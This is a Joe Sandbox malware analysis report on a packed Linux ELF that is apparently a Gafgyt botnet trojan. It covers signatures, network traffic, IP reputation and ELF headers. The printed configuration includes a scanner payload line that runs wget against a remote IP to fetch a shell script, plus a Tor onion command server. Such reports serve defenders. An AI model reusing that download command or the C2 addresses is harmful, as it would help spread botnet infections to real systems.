Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_64.bin.elf

Overview

General Information

Sample name:x86_64.bin.elf
Analysis ID:1541867
MD5:c309d84aff381e7831ba2bd5ac72d973
SHA1:95571a6646766419973682da7bb4a7dfbc64b65e
SHA256:bd958006ac58d9e9659025a4800c2dfc7003fb93a8fca4fc1c63f349ad688a60
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Found Tor onion address
Sample is packed with UPX
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1541867
Start date and time:2024-10-25 09:06:42 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 13s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_64.bin.elf
Detection:MAL
Classification:mal56.evad.linELF@0/0@0/0
  • VT rate limit hit for: x86_64.bin.elf
Command:/tmp/x86_64.bin.elf
PID:6258
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
CONFIG:
Tor Enabled: true
Tor Server: ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion
Tor Port: 80
Bot server: disable
Bot port: disable
Scanner enabled: true
Scanner payload: wget http://185.196.10.215:12234/hi.sh
Scanner min num cpu: 3
Max cpu value: 90
Killer enabled: true
Min-Max killer pid: 100-0
------------------------
Process id: 6258
[main] Forked: 6264
[main] onnecting to the bot server...
[killer rebind] Can't bind 22 (ssh) port: address already in use
Standard Error:
  • system is lnxubuntu20
  • x86_64.bin.elf (PID: 6258, Parent: 6182, MD5: c309d84aff381e7831ba2bd5ac72d973) Arguments: /tmp/x86_64.bin.elf
  • cleanup
SourceRuleDescriptionAuthorStrings
6258.1.000000c000000000.000000c000800000.rw-.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
  • 0x84400:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84414:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84428:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x8443c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84450:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84464:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84478:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x8448c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x844a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x844b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x844c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x844dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x844f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84504:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84518:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x8452c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84540:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84554:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84568:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x8457c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x84590:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: x86_64.bin.elf PID: 6258Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
  • 0x1cc7a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cc8e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cca2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1ccb6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1ccca:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1ccde:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1ccf2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cd06:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cd1a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cd2e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cd42:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cd56:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cd6a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cd7e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cd92:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cda6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cdba:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cdce:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cde2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1cdf6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x1ce0a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Networking

barindex
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\true
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\truex
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\true@s
Source: global trafficTCP traffic: 192.168.2.23:37932 -> 198.50.207.21:1024
Source: /tmp/x86_64.bin.elf (PID: 6258)Socket: 127.0.0.1:4628Jump to behavior
Source: /tmp/x86_64.bin.elf (PID: 6264)Socket: 127.0.0.1:23Jump to behavior
Source: /tmp/x86_64.bin.elf (PID: 6264)Socket: 0.0.0.0:0Jump to behavior
Source: /tmp/x86_64.bin.elf (PID: 6264)Socket: 127.0.0.1:80Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 198.50.207.21
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 198.50.207.21
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://185.196.10.215:12234/hi.sh
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://http://uhttp://uphttp://upxhttp://upx.http://upx.shttp://upx.sfhttp://upx.sf.nethttp://upx.sf
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://upx.sf
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://upx.sf.
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://upx.sf.n
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://upx.sf.neU
Source: x86_64.bin.elfString found in binary or memory: http://upx.sf.net
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://upx.sf.nethttp://upx.sf.netCONFIG:
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.google.com/bot.html)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.googlebot.com/bot.html)
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.googlebot.com/bot.html)Mozilla/4.0
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: x86_64.bin.elf PID: 6258, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: LOAD without section mappingsProgram segment: 0x400000
Source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86_64.bin.elf PID: 6258, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: classification engineClassification label: mal56.evad.linELF@0/0@0/0

Data Obfuscation

barindex
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 4.02 Copyright (C) 1996-2023 the UPX Team. All Rights Reserved. $
Source: x86_64.bin.elfSubmission file: segment LOAD with 7.8235 entropy (max. 8.0)
Source: x86_64.bin.elfSubmission file: segment LOAD with 7.9999 entropy (max. 8.0)
Source: x86_64.bin.elfBinary or memory string: vmCio
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception11
Obfuscated Files or Information
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Proxy
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
SourceDetectionScannerLabelLink
x86_64.bin.elf3%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://upx.sf.nethttp://upx.sf.netCONFIG:x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
    unknown
    http://upx.sf.x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmptrue
      unknown
      http://help.yahoo.com/help/us/ysearch/slurp)x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
        unknown
        http://upx.sf.nx86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmptrue
          unknown
          http://www.google.com/bot.html)x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
            unknown
            http://help.yahoo.com/help/us/shop/merchant/)Mozilla/5.0x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              unknown
              http://help.yahoo.com/help/us/shop/merchant/)x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                unknown
                http://upx.sf.neUx86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                  unknown
                  http://185.196.10.215:12234/hi.shx86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmptrue
                    unknown
                    http://help.yahoo.com/help/us/ysearch/slurp)Mozilla/5.0x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                      unknown
                      http://upx.sf.netx86_64.bin.elftrue
                      • URL Reputation: safe
                      unknown
                      http://www.google.com/bot.html)Mozilla/5.0x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                        unknown
                        http://http://uhttp://uphttp://upxhttp://upx.http://upx.shttp://upx.sfhttp://upx.sf.nethttp://upx.sfx86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                          unknown
                          http://upx.sfx86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmptrue
                            unknown
                            http://www.googlebot.com/bot.html)x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                              unknown
                              http://www.googlebot.com/bot.html)Mozilla/4.0x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmpfalse
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                198.50.207.21
                                unknownCanada
                                16276OVHFRfalse
                                109.202.202.202
                                unknownSwitzerland
                                13030INIT7CHfalse
                                91.189.91.43
                                unknownUnited Kingdom
                                41231CANONICAL-ASGBfalse
                                91.189.91.42
                                unknownUnited Kingdom
                                41231CANONICAL-ASGBfalse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                91.189.91.434NHwncXqsj.elfGet hashmaliciousUnknownBrowse
                                  spc.elfGet hashmaliciousUnknownBrowse
                                    x86.elfGet hashmaliciousUnknownBrowse
                                      c0r0n4x.arm7.elfGet hashmaliciousMiraiBrowse
                                        arm.elfGet hashmaliciousUnknownBrowse
                                          sh4.elfGet hashmaliciousUnknownBrowse
                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                              ppc.elfGet hashmaliciousUnknownBrowse
                                                x86.elfGet hashmaliciousUnknownBrowse
                                                  m68k.elfGet hashmaliciousUnknownBrowse
                                                    91.189.91.424NHwncXqsj.elfGet hashmaliciousUnknownBrowse
                                                      spc.elfGet hashmaliciousUnknownBrowse
                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                          c0r0n4x.arm7.elfGet hashmaliciousMiraiBrowse
                                                            arm.elfGet hashmaliciousUnknownBrowse
                                                              sh4.elfGet hashmaliciousUnknownBrowse
                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  ppc.elfGet hashmaliciousUnknownBrowse
                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                      m68k.elfGet hashmaliciousUnknownBrowse
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CANONICAL-ASGB4NHwncXqsj.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        spc.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        c0r0n4x.arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 91.189.91.42
                                                                        arm.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        ppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        m68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        CANONICAL-ASGB4NHwncXqsj.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        spc.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        c0r0n4x.arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 91.189.91.42
                                                                        arm.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        ppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        m68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.189.91.42
                                                                        OVHFRczHBnd67gp.elfGet hashmaliciousUnknownBrowse
                                                                        • 164.132.129.125
                                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                        • 188.165.219.94
                                                                        http://www.xn--invitacionesdecumpleaos-dic.org/Get hashmaliciousUnknownBrowse
                                                                        • 51.89.9.252
                                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                        • 51.195.175.186
                                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                        • 8.33.220.44
                                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                        • 192.99.207.238
                                                                        https://u47751895.ct.sendgrid.net/ls/click?upn=u001.LUpianUM71xe7PV7wDA6i1kcuy38W249FfPzE-2Fn4iGArrL0MQBCUZHFEzmfBrwW7hf5h8aNQUml0OSIHqpXf0Hd-2FwQBg2gsGxKHK7PsY2xc-3DPya1_YT5LbHmSQ6soq50ixwpFbSYZshuq6-2FPFgRa8NDnR03IYhL-2F9Rsp4maHC7HKUeszLncLvtZaWCVsMwsguQ5-2FbgriKbvHymTrFFrqjql1V0tvMkZQvyA1xxy-2B6NtGFoUeUGIrvdabsXN8enx2k5c-2BvLXzm-2BRXmD29Cf33DbXC513Cwkuo46G2I7a1uwsANH8eVhz8r5XyLPneRi4ngixWtQkBEaLBBKkl5CzEPySNlMnqJuuWiTBlFswgUf9EX-2BEhUpqAvMFuAlKTpYcteS-2FjAegbPmUSDcSeBkfnhL6yUhTFHUFrxra-2BdIgnamsXKUUqu-2BC45G51EOfBd9qOCqWy3OeOC7KYj3-2FcaIfcOAM1Jkvyddtn3gwRC5w97RLza-2BBM2JcZLNzMYva4SJzBZv7RClCaMcjevyjP6ZFvlR0NECf5zAmWbPLmCUnefze8ZyTvnDqXVb3nrflSdnTlNxWfm617xjOrSoSu-2BVHZVqbE92ZodSyvWqgaCWZg0TMDZeq64M67nuH9ryo7I5u80SS081vnMThCYiPoN3JUoUliQPKbNY46GxAPyVhMs4qqZVi-2FFUtIGEycXziXytxfy6JCzAZ2sa7DZusc1RftLAVM4uJit-2FAhxM-2FK1sEHsKHKvs9o7uDMExZ5YqEBjrD2XHch-2BY6xwRGGg56MeC1Bpa72xAoR6DmInmiEX4j92yaROEh1-2FMsHdtSstN7zc8gxU7ETVWVMBRLf6m4dTRruSfSNaLUi9QLq9d7Qfe8VMdKN1j9FMGIYia88728BDNNxRTaT4nSNITRr9JPa4Z1K1vdUocdyCKNcYSZsN8yguI0-2FqNXUfWFuoxnz5MDqwufLzxub8Fw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                        • 51.68.228.155
                                                                        http://tronlkam8s2.z13.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                                                                        • 147.135.36.89
                                                                        newsampleGet hashmaliciousMirai, OkiruBrowse
                                                                        • 51.75.77.30
                                                                        http://tracking.nod.ro/tracking/click?d=8REPYbZ94cOn_ul_JxRkLKBjFbxwY-GUgS6EV0s7kapGO_zjZE0f1KtLYT5c7nKgelvuD3vDbSI0lknICwSLWolTib8seslw-_rGaMeEVl6PzTFFf9lSRdtGv9cgKIAiR7f5TSW7wlUFE8pTfmAWGF-pjwVLBAEMrKv3pAyCL9Fm0Get hashmaliciousUnknownBrowse
                                                                        • 94.23.161.19
                                                                        INIT7CH4NHwncXqsj.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        spc.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        c0r0n4x.arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 109.202.202.202
                                                                        arm.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        ppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        m68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.202.202.202
                                                                        No context
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                                                        Entropy (8bit):7.999916174065972
                                                                        TrID:
                                                                        • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                        • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                        File name:x86_64.bin.elf
                                                                        File size:2'866'968 bytes
                                                                        MD5:c309d84aff381e7831ba2bd5ac72d973
                                                                        SHA1:95571a6646766419973682da7bb4a7dfbc64b65e
                                                                        SHA256:bd958006ac58d9e9659025a4800c2dfc7003fb93a8fca4fc1c63f349ad688a60
                                                                        SHA512:474f71e6ebf80b9372aa6120a60d53d37e6ccbb2509d99b9b56c1541fac5a95f9147577fd2949ad115018101b77dbe8b1af32989e8da1f08b75e021de140abfa
                                                                        SSDEEP:49152:nZ8+xYxREQ37ETfCPW2j72C0I+FZxjflafyl/5O9/Hrn8DKUH7lyrRut9hLw5r:nZf0EvTqPfjqCSFZxjflaqBm/IK+lyky
                                                                        TLSH:CDD533FC22D950089BE213B515D54BCCAE0BE340CA84F222767B0D6EA57066CF93F6B0
                                                                        File Content Preview:.ELF..............>.....H.......@...................@.8...........................@.......@.............bL...............................P.......P....../.+...../.+.............Q.td....................................................C...UPX!.........@....d

                                                                        ELF header

                                                                        Class:ELF64
                                                                        Data:2's complement, little endian
                                                                        Version:1 (current)
                                                                        Machine:Advanced Micro Devices X86-64
                                                                        Version Number:0x1
                                                                        Type:EXEC (Executable file)
                                                                        OS/ABI:UNIX - System V
                                                                        ABI Version:0
                                                                        Entry Point Address:0x10afa48
                                                                        Flags:0x0
                                                                        ELF Header Size:64
                                                                        Program Header Offset:64
                                                                        Program Header Size:56
                                                                        Number of Program Headers:3
                                                                        Section Header Offset:0
                                                                        Section Header Size:0
                                                                        Number of Section Headers:0
                                                                        Header String Table Index:0
                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                        LOAD0x00x4000000x4000000x10000x9f4c627.82350x6RW 0x1000
